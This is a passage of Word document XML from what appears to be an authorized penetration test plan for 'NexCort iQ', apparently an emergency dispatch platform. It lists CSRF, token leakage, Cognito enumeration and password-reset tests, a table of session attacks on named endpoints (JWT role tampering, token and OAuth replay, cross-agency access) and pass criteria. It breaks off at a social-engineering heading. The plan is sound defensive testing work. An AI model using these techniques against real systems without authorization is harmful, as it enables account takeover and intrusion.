          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Build a cross-origin form that submits to a NexCort iQ endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># If the request succeeds from a different origin — CSRF is possible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test the CAD write-back approval endpoint specifically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># POST /api/admin/cad-writeback-approvals/{id}/approve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Should require CSRF token or check Origin/Referer header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Token Leakage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check CloudWatch log groups for JWT tokens in Lambda logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check API Gateway access logs for Authorization header values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify Ring access tokens are not returned in any API response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check that QR scan events do not log user session tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify presigned S3 URLs expire correctly (max 1 hour per policy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Cognito-Specific Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test user pool enumeration via login error messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 'User does not exist' vs 'Incorrect password' leaks valid usernames</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test account takeover via password reset flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Can an attacker request a password reset for any email?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Does the reset code expire and work only once?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test Cognito refresh token rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Can a stolen refresh token be used after the user logs out?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ Specific Session Risks</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60"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint / Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dispatcher impersonation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">All dispatch API endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tamper agencyId/role in JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Supervisor approval bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/admin/cad-writeback-approvals/*/approve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Replay dispatcher token against approve endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-agency incident access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/incidents/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Use Agency A token to request Agency B incident ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ring token reuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/integrations/ring/callback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Replay OAuth code after it has been exchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CAP token replay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/cad/cap/ingest/{agencyId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Replay a previously accepted CAP alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Stale OAuth state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ring login flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit two simultaneous login requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pricing data access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/admin/pricing/global</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Use rcadmin token against rcsuperadmin endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithm confusion attacks rejected with 401</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">None algorithm JWT rejected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tokens do not appear in any CloudWatch log group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF protection present on all state-changing endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cognito user pool does not enumerate valid usernames via error messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Refresh tokens invalidated on logout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ring OAuth state tokens are single-use and expire after 600 seconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 — Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="EF4444" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ WARNING: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
